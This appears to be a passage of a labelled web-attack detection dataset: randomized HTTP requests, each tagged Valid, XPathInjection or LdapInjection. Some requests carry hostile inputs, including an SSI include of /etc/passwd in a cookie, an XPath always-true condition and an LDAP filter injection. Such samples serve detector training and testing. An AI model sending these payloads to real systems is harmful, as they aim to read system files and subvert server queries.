GET /pntioftscKeds9io/yeDN1MJkTYluUgID/or@zl/tuE7yjSki_Qw_5kSodu/2amo9ryn/urGOI5zfz/f3@bgN86VT6@SD/r@qas53Lbpqdiq/home@zne/9awgnnsbeiassaeinR4r/intvoknihehnhv72/toey2Onls.html?90i=%3Au&ShTttttear5etwi=08&AT=742577&0sforanun=ir&2ggtsllxdSlHes=65&8iayann=0&tdnasjdzOrs=eOSt&gyn6Fttt4dora=hNA9&norDegn=0 HTTP/1.1
Host: www.hot4eR.fr
Connection: close
Accept: application/postscript;q=0.0, text/plain;q=0.6, video/*;q=0.5
Accept-Charset: windows-1254;q=0.8, iso-10646-ucs-2, x-mac-arabic;q=0.0, ks_c_5601-1987, koi8;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=24
Client-ip: 56.76.66.190
Cookie: boealosioouom=<!--   #include    virtual="/etc/passwd" -->;epn6kAoee=n9maillemnetcatoTeu i;ae9eRtnNf=zstmy 2ueeoikgn;8-pP=Jeddpa;wtrfe=QNrh$rj;neQena8trr3am=8
Cookie2: $Version="547"
Date: Mon, 23 Mar 09 13:21:26 CET
ETag: ".bWPXrpQ6k08iDohAG"
Expect: 100-continue
From: 8enN9@asmbttreae.fr
If-Match: *
If-None-Match: *
If-Range: Wed, 04 Jun 08 02:51:49 UTC
Max-Forwards: 515
MIME-Version: 0.2
Pragma: aldjzht=osdBbh3
Authorization: NTLM MWVpcmNUbGQyZmxpNHRubXRvb29lZWJzb21rZTZ0c2NtRXQyaXVhNGVyVHM=
Range: 430237-,-781
Referer: /derihoIe.html
TE: chunked
Trailer: TE
User-Agent: Mozilla/0.0 (X11; U; Linux i586 5.4; ea-ae; rv:0.1.6) Gecko/24492756
UA-Pixels: 202x813
Via: 9.9 105.148.240.52:088, 9.5 www.noehdq.shtml:7346
Upgrade: kiSb8e/4.9, Eefn/0.2, EwjNtl/1.5, 0modwG/7.2

null

End - Id: 39527
Start - Id: 19613
class: Valid
GET /uonr2ccizdDtiltSer/wgetFsamNcQoy4teD/EfbamqteUtcnhPreen/gAcrgDaCf/t0.htm?xpnoEwh=6336662&H7EobjectHc8TE=oeptou&ntvwynmnfa=797850&AZYincludeG2FNP_Ix=iId9rwHG&SNLr=9&mJbw=o8inaer9ema&fa3eC=tFhFOVehu&pohSgq=tcofjuhONMs&2WZO=deletew&ftD=300 HTTP/1.0
Host: 22.206.212.254
Connection: close
Accept: video/*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.9
Cache-Control: i0r='axeishpn'
Client-ip: 219.255.170.134
Cookie: ge=4538;aHdedouami=actc9Iehatatmo;8Krcpsulogwinnt_3IDy=4080234831;eEote=anantdaais
Cookie2: $Version="32"
Date: Thu, 03 Mar 05 08:53:38 UTC
ETag: W/"m2_RRH@r1h5YarI45"
Expect: rteasasb
From: widc@tloe.fr
If-Modified-Since: Sun, 25 Jul 04 14:55:15 UTC
If-Unmodified-Since: Sun, 18 Jul 04 21:22:00 CET
If-Match: "ZR_xekjRWj3SvK9"
If-None-Match: *
If-Range: "MP6ZRxEzjqDFPO.ojb"
Max-Forwards: 55
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: hnwc eonohrme=eToyi
Authorization: lderk 1ltee=slanil
Range: -4,298-
Referer: /loen.aspx
TE: trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: qI37cQQ http://www.rbts.gov
UA-CPU: x86
UA-Disp: 119,8274,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2031x847
Via: 5.6 www.O5nyj.css, 9.5 www.Biu1dnb.htm
Transfer-Encoding: compress
Upgrade: emf/6.5
Warning: 605 www.dnne.shtml "oI3esi8tekNt" 
X-Forwarded-For: 154.58.1.25
X-Serial-Number: 35644174748471115443
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19613
Start - Id: 5596
class: Valid
PUT /hA/-formLetccpMVyDo/rMiut1Qp6w/ea9001ywypOeR3Q1KY@m/id@aRCBTjG-_OHcI5/eneh7Au/phj.php4? HTTP/1.1
Content-Length: 193
Content-Language: hsfaivtd,Esodsehv,0ni2
Content-Encoding: deflate
Content-Location: /usa7/tscEtlh/Mhhu/h2iev/OnI8rt.png
Content-MD5: b3N0dHQ2ZGo5ZWVtbnNvZg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 10 May 09 21:14:39 UTC
Last-Modified: Tue, 26 Apr 05 11:30:42 UTC
Host: 162.126.165.42
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: compress, deflate, identity;q=0.6, deflate;q=0.3, compress
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 120.107.44.213
Cookie: aytont4uyruaep=Msqvotpet9
Cookie2: $Version="0"
Date: Sat, 11 Nov 06 12:39:38 CET
ETag: "UCgZASr_5zqWrUmFvrA"
Expect: 100-continue
From: eStnia@as0Fhr.uk
If-Modified-Since: Thu, 31 Dec 09 02:41:32 CET
If-Unmodified-Since: Wed, 20 Feb 08 10:18:01 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 20 Jun 08 21:42:12 UTC
Max-Forwards: 2340
MIME-Version: 6.6
Pragma: C8oos=ET
Proxy-Authorization: Digest cnonce="retgil"
Authorization: Digest opaque="jglm4b"
Range: 24-53683,656856-66,34503-
Referer: /agcx.mp3
TE: trailers
Trailer: If-Modified-Since
User-Agent: yzlLIgCjt3 http://www.t3ottwl.net
UA-CPU: MIPS
UA-Disp: 6817,0716,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0202x3743
Via: met9is/6.4 www.9SceOik.png, 7.3 128.84.240.7:1, 9.1 www.ru9od.tiff
Transfer-Encoding: deflate
Upgrade: wsuele/9.6, oarok/0.0, zziraa/8.2
Warning: 629 www.fs0i.shtml "erdO60eMst" 
X-Forwarded-For: 180.152.86.133
X-Serial-Number: 77684507526307
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

BDx_nph-ARET8Y=c2Hrbq3&ncI9p=DFlCT&1ttddm=AditEnw0&drGsashsn=8824466&r9h8ln9s=itn&mHeamzerur=aldexonodh xa&agheeiyn8sd=b;nnulloovbscriptssryewofiExd&p5FoYet=9048995&neeb=2&rn=np having&ep=760

End - Id: 5596
Start - Id: 2337
class: Valid
GET /trTntcUyip/o9bS.QopgI7Vu9LQj/gphpiEIsrmcatZKS_like.html?Er=165&zhIINE=0aneku%25Ar6+ss&etrf6Ieoaeig=0187&n03asteischao=ensNo&jZnetcatlSdropmb=5999042&nhfnun=uggL&sahtaOnina3=1753780440&v_pIalc=xp_tie+8mn%3Apiesns&tr4sitt=nCe5aoNV&8rdeu3ip=5880&cogwbsEPatey=a%3D0m0dexecn%2FvueCnKL&epojrnionnieyrC=lp%2B7&cahi=erbbiyspy7rowhhqh HTTP/1.0
Host: www.ppiosr1e.cz
Connection: close
Accept: */*
Accept-Charset: windows-1252, x-mac-korean;q=0.5, ks_c_5601-1987;q=0.4, iso-2022-kr, x-mac-japanese
Accept-Encoding: deflate, deflate;q=0.2, identity;q=0.3, identity, gzip;q=0.4
Accept-Language: use1Yeyh-uinggH
Cache-Control: only-if-cached
Client-ip: 99.64.17.15
Cookie: Tr5ton=yasl
Cookie2: $Version="0"
Date: Thu, 03 Jul 08 22:35:04 CET
ETag: "JM_Y.OAAIRRMv7jf2x1k"
Expect: 100-continue
From: s4et@ks7hmvs0.net
If-Modified-Since: Wed, 26 Dec 07 20:13:00 CET
If-Unmodified-Since: Fri, 07 May 04 06:57:25 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM MmRvcnNyZnBlZWhtaG9yZWwyYWRkYmV3ZG5lZWEybjZyMzNreWJv
Authorization: Digest cnonce="4wl2tej"
Range: -6000,-150
Referer: /lae0l/pirpww.php4
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: zffbtengn9o
UA-CPU: PowerPC
UA-Disp: 581,250,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1640x452
Via: HTTP/5.6 132.144.34.71, Eyorlo/9.2 137.99.254.142
Transfer-Encoding: s6w1a
Upgrade: nwio/9.0, n54lt8/8.5, iBdj/1.4, mosr/0.0, sgiit/9.8
Warning: 287 www.nmbeojUN.html "ecnaenetwacJolFrOica" "Tue, 01 Dec 09 09:09:42 UTC"
X-Forwarded-For: 120.175.57.26
X-Serial-Number: 7123081582615631
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2337
Start - Id: 48787
class: XPathInjection
GET /hJCxMO.html?peTb=445&._zK8ELC0d=iIee&Broanseta=uud5pr%2Fspan1%2FbOhah%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D60%5D+++++or+++++%27totlp%27++%3D++%27&tvk=I5e7+dsystem+cjinetcate4eprocessing-instructionubo&rn=t0rElP&cras=hlNbC2 HTTP/1.0
Host: 68.114.194.177:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.4, compress;q=0.1, compress;q=0.0, identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 49.61.235.194
Cookie: airovEi2bi=eoSK;ciIleii4=49821
Cookie2: $Version="33"
Date: Mon, 27 Mar 06 04:00:29 CET
ETag: "t_wbub8hlouKz7ojG"
Expect: 100-continue
From: iinongn@mnxs.it
If-Modified-Since: Sun, 23 Jul 06 07:48:35 UTC
If-Unmodified-Since: Sat, 17 Apr 10 19:06:40 CET
If-Match: "APQ6Ske@TeuPoC.3I"
If-None-Match: "Hv8i1IsSmdEyygPLvm"
If-Range: Mon, 08 Dec 08 03:03:19 GMT
Max-Forwards: 0
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: yeerry vuplo=4rasqRlo
Authorization: Basic dTBzcmJsc2I6dHdzYXRy
Range: -2670
Referer: /a3atcau/nt3sb/dd8aBrl/bnidn.jpeg
TE: chunked
Trailer: If-Match
User-Agent: Mozilla/2.1 (compatible; tett; Open BSD i586; 2ruie)
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0640x829
Via: 5.2 4.9.63.250
Transfer-Encoding: compress
Upgrade: awtrEn/2.2, M8nHoh/0.5, rzw/3.0, gda/8.9
Warning: 080 www.ciitli.js "trbebkrzcma82" "Tue, 16 Jan 07 01:29:35 GMT"
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 91085998772983
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48787
Start - Id: 4972
class: Valid
POST /9x3a3.msf? HTTP/1.1
Content-Length: 48
Content-Language: galbnuIe
Content-Encoding: deflate
Content-Location: http://www.anen.st/erupnjc/Oylfna/l5g7.cfm
Content-MD5: YWh2d3J0ZHR0YWVpZmVwaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Mar 07 20:07:20 CET
Last-Modified: Wed, 22 Apr 09 17:01:21 GMT
Host: 145.217.92.8
Connection: 0tiuee
Accept: */*;q=0.1
Accept-Charset: iso-8859-5;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 144.130.250.76
Cookie: El7Z=tnntxp_ishutdownl16d
Cookie2: $Version="1"
Date: Tue, 22 Jul 08 05:09:14 UTC
ETag: W/".RVg91q.nGCx@5v"
Expect: bgentk
From: zqhtasa7@rsaljt.it
If-Modified-Since: Mon, 10 Nov 08 07:40:03 GMT
If-Unmodified-Since: Fri, 18 Jun 04 07:28:33 GMT
If-Match: "VICg9GeUTr_-2wH"
If-None-Match: "fDkoDgN2U8Ysp9ED3"
If-Range: Thu, 10 Dec 09 17:17:42 CET
Max-Forwards: 9
MIME-Version: 8.6
Pragma: nuiea='rstn'
Proxy-Authorization: NTLM eWxvbHNtZTZJYklvZXRuN3lyNkhyemF3ZXN3RWVkdGJqM3NrZzNl
Authorization: NTLM Zm5ldHN4YnNtaXVudDVjaGdOZlRkZW1zYWlyY2d3ZW5yZWw=
Range: 500-
Referer: http://www.ndntj.com/nqedtrbd/imSTeU/tiucd4at.js
TE: deflate;q=0.5
Trailer: From
User-Agent: Mozilla/9.7 (Machintosh; U; PPC Mac OS X 2.8; 7l-Td; rv:9.3.2) Gecko/51752048
UA-CPU: Sparc
UA-Disp: 1425,8375,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 527x0259
Via: FTP/5.2 www.uyne.gif, 8.4 www.pc5r.htm, 8.7 www.zblaus8o.htm:19520
Transfer-Encoding: iechsi
Upgrade: 2tkN/0.3, i2absA/1.0, acAai/6.3, dhvEm/4.4, os7/0.6
Warning: 173 28.187.74.144 "intyt8" "Wed, 16 Jan 08 01:05:54 UTC"
X-Forwarded-For: 26.142.203.81
X-Serial-Number: 3100317318115604683
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

atbr=tomegdnite d(t/ &4ieHdimhdo0qelr=052135

End - Id: 4972
Start - Id: 28352
class: Valid
GET /8zdue/etlzRimEezaseerr1e/andnsdb/iNptTizcehhj2sby/j9ez-gE3R0i8/eiam4nagslnPreadaf/bi/dt16e.msf?vvWie=28654089&tqfriieeohrol=tpdYlQb0Ix&veajlrjkla=7r55lssnrhB%2Bei&3adr=75953&du0PiCseze=om&fgazisr4etit=86942&v9WP=t%3EhcTfty7sou&coxsy=erpasswdplsqdne%7Edeleten&tu5esWauRuu=0672130&asuoteitxdI1sbi=hWZ%40&gpcswwdoidttd5o=189945 HTTP/1.0
Host: www.r3slOeher.net
Connection: enno
Accept: */*;q=0.9
Accept-Charset: ks_c_5601-1987, x-mac-arabic;q=0.8
Accept-Encoding: 
Accept-Language: a-e6e, oui0tnH-he82tt, hsmDji-ryATty1o
Cache-Control: no-transform
Client-ip: 47.222.40.20
Cookie: enHylai=3;TYiN=erofguainrdEdwE;ylyl2pnIc=6881953;dybEopaimYH=6oIo;hKTeprocessing-instruction=z88dT85.;snrbefrq=18
Cookie2: $Version="77"
Date: Fri, 06 Feb 04 04:23:57 CET
ETag: W/"olj8UG-.o1dgyShP8aw"
Expect: RseOc
From: nicserws@tdhtrrpo.net
If-Modified-Since: Wed, 25 Mar 09 18:23:41 UTC
If-Unmodified-Since: Thu, 26 Jan 06 10:55:52 UTC
If-Match: "XEgKDJ5EPG53ZcZz"
If-None-Match: "BhTd7CDul9oxrpYubL"
If-Range: *
Max-Forwards: 79
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic bmhycGhuVzp0Y2VUYnB0dA==
Authorization: Digest opaque="tkoN6a"
Range: 5-362340,-79,830-62
Referer: /uwlus.fgf
TE: trailers
Trailer: Referer
User-Agent: itcoCose0Y (hCFr_e.Rmw; gJpfsRJM; tTAEiRnz)
UA-CPU: StrongARM
UA-Disp: 547,716,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6491x0728
Via: HTTP/0.5 104.226.96.99, 3.4 250.93.225.233
Transfer-Encoding: compress
Upgrade: mNe/8.8, ehIbla/4.3, s6oaa/4.9, cih/1.0
Warning: 976 163.70.1.255 "k7Tsaetaotwo" 
X-Forwarded-For: 156.99.87.237
X-Serial-Number: 3075652
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28352
Start - Id: 3317
class: Valid
GET /mUFK4AR7E/aqsTz5ha5ulqvage.html?el00=23674835&tThoawohe0tb4z=6883&UWnwu9Vmailconnect1mI=%3Ch4oaeseEjou+%3Fendj&trtro=4codcri&1o0inuttedf2pa=a.V8&4n=%2FfubodyGn&tulhsmhso=5843168 HTTP/1.1
Host: 176.99.184.158:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic
Accept-Encoding: identity;q=0.6, identity;q=0.0
Accept-Language: i977Rl-ia;q=0.2, y3-ac;q=0.1, aaHaNxot-fZh, RuCdma-dr, ox3ae-lze3
Cache-Control: max-age=47
Client-ip: 249.176.180.104
Cookie: YhEHimetahttplaTuS=eR$;B7fsty4sidi=Piehoeo;varB0passthru.w@=snrmaili;hpn1aeoFoDhrsZh=eonytfaoiern;Cllii3aet5uefi=4U
Cookie2: $Version="250"
Date: Fri, 17 Oct 08 02:15:35 UTC
ETag: W/"7aCyiCAwCfirpiBk4_"
Expect: wd2e
From: ieec@Aw8rhen.st
If-Modified-Since: Thu, 12 Apr 07 21:27:26 CET
If-Unmodified-Since: Wed, 24 Jun 09 09:39:57 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 12 Mar 08 17:00:15 UTC
Max-Forwards: 6
MIME-Version: 4.9
Pragma: rgehegd='eh05rw5'
Proxy-Authorization: Digest realm
Authorization: Digest uri=/p71r/6g6N/si7l.asp
Range: 715429-,64862-,731-870612
Referer: /ok2Tl/ctanmaeD.jpeg
TE: deflate;q=0.1,trailers,deflate
Trailer: Expect
User-Agent: Mozilla/6.6 (X11; U; Unix 3.9; ow-fn; rv:4.1.0) Gecko/23857845
UA-CPU: MIPS
UA-Disp: 517,125,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 701x9468
Via: 0.5 132.246.120.164
Transfer-Encoding: gzip
Upgrade: sfei7t/3.5, ilaoe/9.0, lis0es/1.6, 9aRse/4.0
Warning: 659 214.21.203.106 "Esha" 
X-Forwarded-For: 72.237.241.25
X-Serial-Number: 246670364
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3317
Start - Id: 37894
class: LdapInjection
GET /wQLg5HmdropowZZshutdown3k/125W/ohoaoihee3htlunsm/tX3ifHiYY@NI5-@EH/eznhreOenfcmiowedhce/w5-RtAHhBLZ/iPKfe_9V@2HlhCygWe9k/nc.js?5eic5aongs=tsoerS%3Aocen+&oaHihfs=sjei1ihsssiee&tuss5eayN5=xSO3dWmFk8n&yiidlmlzvDlr=tSuM&m3oyE9E8srsaol=wURNC1bXd%40ig&ndenn=ea3zc&e8=bjk2TW0&zI=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: 0.78.182.34
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-greek;q=0.4
Accept-Encoding: gzip, deflate, identity;q=0.1
Accept-Language: e-uShrtyol;q=0.6, A-ertHo, f1-9acotng;q=0.0, eed-era;q=0.1, Mmar9v-sx;q=0.8
Cache-Control: iteelW='g0orp'
Client-ip: 64.67.93.181
Cookie: 5s=ipassthru;6BS_position@rBL-dropT=tw\r5nq;swO-V=l2Ssr;BmwhereRyGlE3ZP=283
Cookie2: $Version="1"
Date: Thu, 16 Jun 05 22:03:13 UTC
ETag: W/"k_eK26HPsis_XTtOs"
Expect: 4UHf=yc9Ggg;iOlgaObr=Elden
From: pyeere9e@rgid7rnosp.be
If-Modified-Since: Wed, 25 Nov 09 08:45:54 CET
If-Unmodified-Since: Sun, 17 Jun 07 08:40:59 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 10 Nov 09 24:54:11 GMT
Max-Forwards: 463
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic OGF2ZW52OmlvdG90ZA==
Authorization: Basic ZWw5dDM6VXNzVXNh
Range: 33054-,52759-13523
Referer: /ttthQarn/atensa/irteev6e/5Noe2a.avi
TE: chunked;q=0.3,deflate,trailers
Trailer: User-Agent
User-Agent: Mozilla/4.3 (X11; U; Unix 1.9; ye-wi; rv:8.0.7) Gecko/09707781
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: 4.1 www.9len.shtml:058, 6.7 121.38.160.197
Transfer-Encoding: gzip
Upgrade: coid/6.4, u7a/5.9, ltuf/8.7, 7Shik/8.1, mtto/2.2
Warning: 960 www.tzoEs.tiff "dlespebn" "Wed, 09 Aug 06 04:59:18 CET"
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 9686105266248523
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37894
Start - Id: 24691
class: Valid
GET /IW.tiff?ktn1ld3uh4da1=jir5eu9hwsd&6eeacict6I3K7=86&eohFgrgrc=%26Rk&iuulee=0492072&v8eB=iowlon HTTP/1.1
Host: www.ofamda.st
Connection: t8rn
Accept: */*
Accept-Charset: us-ascii;q=0.0, windows-1258;q=0.2, us-ascii, windows-1252;q=0.0
Accept-Encoding: gzip, identity, compress, compress
Accept-Language: 3e-gS;q=0.0, Tshauas-aliAiR, Ejnn-ssa4i;q=0.7
Cache-Control: no-store
Client-ip: 130.174.201.192
Cookie: 4csieenf=9;WGnetcatYdPl@Ne=s/<;daeuuk44iAe=4tssnqeyqdo=6w;wehaQatt=ctiamYrjrnuyto;ecovhbl=aB@Sil
Cookie2: $Version="43"
Date: Thu, 28 Jan 10 12:05:55 GMT
ETag: W/"cuOdJQo.HAbVU9zWNc_"
Expect: 100-continue
From: dsetoca@p0seNgaU4a.de
If-Modified-Since: Sat, 10 May 08 05:38:21 GMT
If-Unmodified-Since: Wed, 17 Sep 08 07:07:07 UTC
If-Match: "BjVB.lQmRl6l9WtvxE"
If-None-Match: "CG7HTWP2z5BeIPjHyZn5"
If-Range: *
Max-Forwards: 2
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest response="429aD00b8DDd9df7B74f8ecAC24D449D"
Authorization: Digest username="mu6tmuf"
Range: 1773-,147343-45947,-7279
Referer: http://m2lTlsi.org/spelts.cgi
TE: chunked;q=0.6,trailers
Trailer: Cache-Control
User-Agent: 0tte (mJNrm3CbzF; fTgzEy; o-A3Gifsh; dorf.k; aNfdAg)
UA-CPU: PowerPC
UA-Disp: 9340,8339,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 319x7943
Via: HTTP/7.7 www.exne5.jpeg:16651
Transfer-Encoding: compress
Upgrade: noohwb/5.0
Warning: 540 44.10.123.96:4 "peien0ehi" 
X-Forwarded-For: 248.154.151.220
X-Serial-Number: 7759023411175915
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 24691
Start - Id: 5984
class: Valid
POST /qbi1S8rgmhjepai6.jpeg? HTTP/1.1
Content-Length: 135
Content-Language: ebsflie,eivgNoe,rc2yn
Content-Encoding: compress
Content-Location: http://teiiaogr.it/ntsxacIe/zk8xie/a6Ga/nherft.cgi
Content-MD5: aXo0bGFNZDR0RGZlWHhuVA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Jun 04 05:15:49 UTC
Last-Modified: Tue, 29 Jun 04 07:53:50 CET
Host: www.sls7.com
Connection: close
Accept: video/quicktime;q=0.9, application/rtf
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.1
Accept-Language: uslfee-g;q=0.8
Cache-Control: only-if-cached
Client-ip: 157.18.89.84
Cookie: KEtmp_=taaiitwe9a;T4-OpasswdWCselectV1connectf=smidsoeaf
Cookie2: $Version="00"
Date: Thu, 29 Nov 07 12:29:29 GMT
ETag: W/"@2rwa41.yZ6O3.dQA"
Expect: rr6iNl
From: aH2oeaxm@3EiRSay.org
If-Modified-Since: Sat, 02 Feb 08 20:33:24 UTC
If-Unmodified-Since: Tue, 29 May 07 20:47:36 UTC
If-Match: "SdMgTHDdD6waJWCZb"
If-None-Match: "H6KH-4jOw4CnNJ7yu"
If-Range: Wed, 25 Jul 07 18:01:21 GMT
Max-Forwards: 09
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest nc=691127d9
Authorization: orco nenIeucx=shart0ia
Range: 7772-71595
Referer: http://nonuntas.it/iebguoht/aobpW.dll
TE: trailers
Trailer: User-Agent
User-Agent: ecneeaN/6.9.8
UA-CPU: PowerPC
UA-Disp: 879,569,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3062x279
Via: 3.0 6.203.184.21
Transfer-Encoding: compress
Upgrade: treana/1.3, oher5/3.1
Warning: 803 226.93.188.78:98 "lhtttca3" 
X-Forwarded-For: 232.218.22.35
X-Serial-Number: 913619752558918
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

llrpueplCou=05109241&puePsEl=5979324&e6eiz9mz=trVXhs3&hinnaadv7d=Evszpaaj&rhAibooS1ssn7=oOaa&d8araoe2abae=boIan9c5dt=c&iahaiifa3HC3=2

End - Id: 5984
Start - Id: 22444
class: Valid
GET /g7caae1/wa2CaielrELsgesru/eiw2dtktRe/sJ_Kpd/mHensh/ej9q9arv8@3SbXTqu/l6ycotLnsmus1Ls/m5e/hyreeiA/ey0nZs5Hth.php4?35r6ebs=of&o4=59587&vr=childEseerimoea7fi6 HTTP/1.1
Host: www.ehelk.cz:1416
Connection: 5rhRut
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: 5-T;q=0.0, dit-20roett, Ztutp-qngng, 5s-utaasnIa;q=0.3
Cache-Control: no-cache
Client-ip: 242.133.189.214
Cookie: eMtoenoTusj=02;iuc9re=aCS8K1d
Cookie2: $Version="35"
Date: Sun, 14 May 06 01:02:29 UTC
ETag: "xa-zMNeKb3jW4Lg6"
Expect: 100-continue
From: ihv7ae@aqtd1l3.cz
If-Modified-Since: Mon, 27 Dec 04 07:12:46 UTC
If-Unmodified-Since: Fri, 16 Feb 07 16:50:34 GMT
If-Match: "cZG6dKQvnvdFAFp0XjiE"
If-None-Match: *
If-Range: *
Max-Forwards: 1163
MIME-Version: 6.3
Pragma: d='ukQde'
Proxy-Authorization: Basic TzNkcjpsODF0VG8=
Authorization: Gxsl amLeYap=bseIIluD
Range: 6444-70796,874-
Referer: http://www.nslhln.com/earu/1iuetBtS/bisoasst/v1le5ts.gz
TE: chunked;q=0.4
Trailer: Authorization
User-Agent: Mozilla/4.1 (compatible; MSIE 9.2; Mac OS X; racleAyhm; Eaau)
UA-CPU: Sparc
UA-Disp: 8455,3550,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 112x1566
Via: 1.7 115.105.193.186, 9.4 www.blcY.jpg
Transfer-Encoding: identity
Upgrade: plrEu/0.9, 0onans/5.6, irA/4.2
Warning: 775 242.150.48.252:01439 "edbeecvdNatlhToaah" "Thu, 14 Jul 05 23:57:30 CET"
X-Forwarded-For: 14.86.146.83
X-Serial-Number: 5826747890581
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 22444
Start - Id: 31640
class: Valid
GET /cBs3MoBAGjQEBK/aruanh3v/eo/DnOru.VSOBxV/Ttno/stwr1it5ehl3/4@LrJjFe_8-6DVnRJPd.asp?tbswn=oemekeS HTTP/1.0
Host: 152.92.221.93:80
Connection: close
Accept: video/*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: aati-miguNu;q=0.7, 5o-rlm, eauSt2r-barbsth
Cache-Control: no-transform
Client-ip: 51.126.92.214
Cookie: mbtlernento=29;hepri=02702;kMG3=e1
Cookie2: $Version="7"
Date: Mon, 06 Oct 08 07:34:21 GMT
ETag: "3pdcmRCK1-WGptGSP"
Expect: leqhp5qI
From: 5njLtrtq@8sti3c.net
If-Modified-Since: Mon, 19 Apr 04 23:37:49 GMT
If-Unmodified-Since: Tue, 16 Jan 07 05:20:08 CET
If-Match: "a4NCg733hnySmz8P5F@"
If-None-Match: "zW..4gAX4BfGbWc@"
If-Range: "S6xYQXRuZuiLDwjYiMC"
Max-Forwards: 0371
MIME-Version: 6.6
Pragma: mptHo0=wynm
Proxy-Authorization: Basic TnlFY2hwaTptdHN1YQ==
Authorization: NTLM aHNSYW5yZmlyZ3V1ZTdhdzl1RHBhdWxuNnQ1aXdpb2w1aXRwZmE=
Range: 2995-
Referer: http://www.E5ewa.biz/yann/slrmzrei/kydm/ueot.jpeg
TE: gzip;q=0.3
Trailer: Warning
User-Agent: Mozilla/4.6 (Windows; U; Win 9x 2.9; sv-si; rv:5.1.3) Gecko/29182528
UA-CPU: 68000
UA-Disp: 0279,131,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8191x528
Via: tKNt/1.1 www.rrtiiii.jpeg
Transfer-Encoding: iosg8t
Upgrade: o45mrn/3.4, Xue/3.4, Eoh/8.3, ote/8.9, 9Uiay/0.3
Warning: 847 245.165.104.253:38182 "wolt9DaseP" 
X-Forwarded-For: 13.228.134.190
X-Serial-Number: 049800080
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31640
Start - Id: 14761
class: Valid
GET /x7iF3PHjbcrkt@r.v/oeSk3@y_position-vsR/4uQnUererpp9/hlbAof-K-CB0D_0/iTb-DdUoG16my/.Qeoh/a05rVtmgtod2es52ase/e6T6AS/tsbai/@.%u/c634lueSmj/rmshutdownopenX0uCT68O.jpg?edcieouut=885713 HTTP/1.1
Host: 46.159.67.255
Connection: close
Accept: */*
Accept-Charset: iso-8859-5, iso-2022-kr, iso-2022-kr
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 251.25.146.32
Cookie: x3kGo=imtui
Cookie2: $Version="1"
Date: Wed, 06 Sep 06 07:35:03 GMT
ETag: "APGpywQRqorY-BwL"
Expect: 100-continue
From: owsogmh@sdEtisrsme.org
If-Modified-Since: Mon, 21 Apr 08 20:58:15 CET
If-Unmodified-Since: Sun, 10 Jun 07 20:20:04 CET
If-Match: *
If-None-Match: *
If-Range: "ZTGVjf@V7a9mnet3W"
Max-Forwards: 2063
MIME-Version: 6.6
Pragma: no-cache
